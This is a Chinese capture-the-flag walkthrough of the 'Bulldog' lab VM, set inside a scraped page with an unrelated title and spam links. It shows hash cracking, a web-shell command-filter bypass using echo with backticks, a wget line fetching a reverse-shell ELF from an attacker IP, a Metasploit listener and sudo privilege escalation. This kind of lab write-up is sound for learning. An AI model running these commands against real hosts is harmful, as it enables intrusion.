当前位置: 首页 > news >正文

替别人做网站管理员线上宣传推广方式

替别人做网站管理员,线上宣传推广方式,html代码中标签的书写不区分大小写,微信引流主动被加软件声明 文中涉及操作均来自靶机虚拟环境,禁止用于真实环境,任何未经授权的渗透测试都是违法行为! 开搞 首先nmap扫描目标机开放端口和服务 访问80端口 扫目录撒 发现登录口 点击web-shell提示登录后才能使用 /dev/下面查看网页源码发现村咋h…

声明

文中涉及操作均来自靶机虚拟环境,禁止用于真实环境,任何未经授权的渗透测试都是违法行为!

开搞

首先nmap扫描目标机开放端口和服务

在这里插入图片描述

访问80端口

在这里插入图片描述

扫目录撒

在这里插入图片描述

发现登录口

在这里插入图片描述
在这里插入图片描述
点击web-shell提示登录后才能使用

在这里插入图片描述

/dev/下面查看网页源码发现村咋hash值

在这里插入图片描述

awk提取hash

把那堆复制到1.txt中提取
在这里插入图片描述

在线解密

https://crackstation.net/
在这里插入图片描述

nick/bulldog登录

在这里插入图片描述

进入web-shell

可以执行命令
在这里插入图片描述
但是很多命令不让用
在这里插入图片描述
可以用echo `curl` 的方法绕过限制
在这里插入图片描述

创建反弹shell

python起个服务

在这里插入图片描述

wget下载到目标

echo `wget http://192.168.2.129:5555/5555.elf`

在这里插入图片描述

msf建立监听

在这里插入图片描述

给5555.elf添加执行权限并执行

在这里插入图片描述

拿到shell

在这里插入图片描述

进入shell

在这里插入图片描述

查看家目录有啥

在这里插入图片描述

查看hiddenadmindirectory

查看note
在这里插入图片描述

密码藏在customPermissionApp

SUPERultimatePASSWORDyouCANTget
在这里插入图片描述

结束

因为这个文件是bulldogadmin的文件,我的身份是django,所以需要sudo 去给他加执行权限,sudo chmod 777 customPermissionApp就要用到django的密码
执行后变成了root权限
靶标一般就在root目录下
在这里插入图片描述

http://www.yayakq.cn/news/658249/

相关文章:

  • 网站建设怎样海南中小企业网站建设
  • 网站建设后台什么意思wordpress html编辑
  • 江门站排名优化ui设计和网站建设人员李伟宁
  • 外链生成网站深圳罗湖区网站开发公司
  • 网站注册费用seo排名关键词搜索结果
  • 医院网站建设方案ppt高端建筑班
  • 湖北省城乡与住房建设厅网站乌镇网站建设标书
  • 做网站商丘图文生成二维码免费
  • 三明做网站公司手机微信怎么建立公众号
  • 那个合作网站做360推广比较好什么网站做一手房比较好
  • 建设设计院网站网站产品详情页怎么做
  • 移动电子商务网站建设如何让网站关键词搜录
  • 如何做盗版视频网站邢台网站制作哪里做
  • 大流量网站开发wordpress母婴主题
  • 网络公司网站做的不错的广州高端网页制作
  • 一般网站建设费用做seo网站不用域名
  • dw设计试图做网站企业网企业网站制作
  • 海山网站建设是做网站好还是做游戏好
  • 怎么用域名做网站自己会网站开发如何赚钱
  • 网站开发的技术类型有哪些东营网站制作公司
  • 网站建设v5star江苏华能建设集团有限公司网站
  • 单网页网站 企业网站开发 文学
  • 青海省建设网站多少钱建筑工程网络教育网
  • 如何用phpstorm做网站旅游网站html
  • 网站后台更新了 前台不现实陈木胜拍完怒火重案了吗
  • 电商网站如何备案网上seo研究
  • 新吴区推荐做网站价格建行网银登录
  • dede 网站地图怎么做网络营销一般做什么推广
  • 旅游攻略网站源码长春有免费做网站的么
  • 网站开发公司业务员培训源码商城网站源码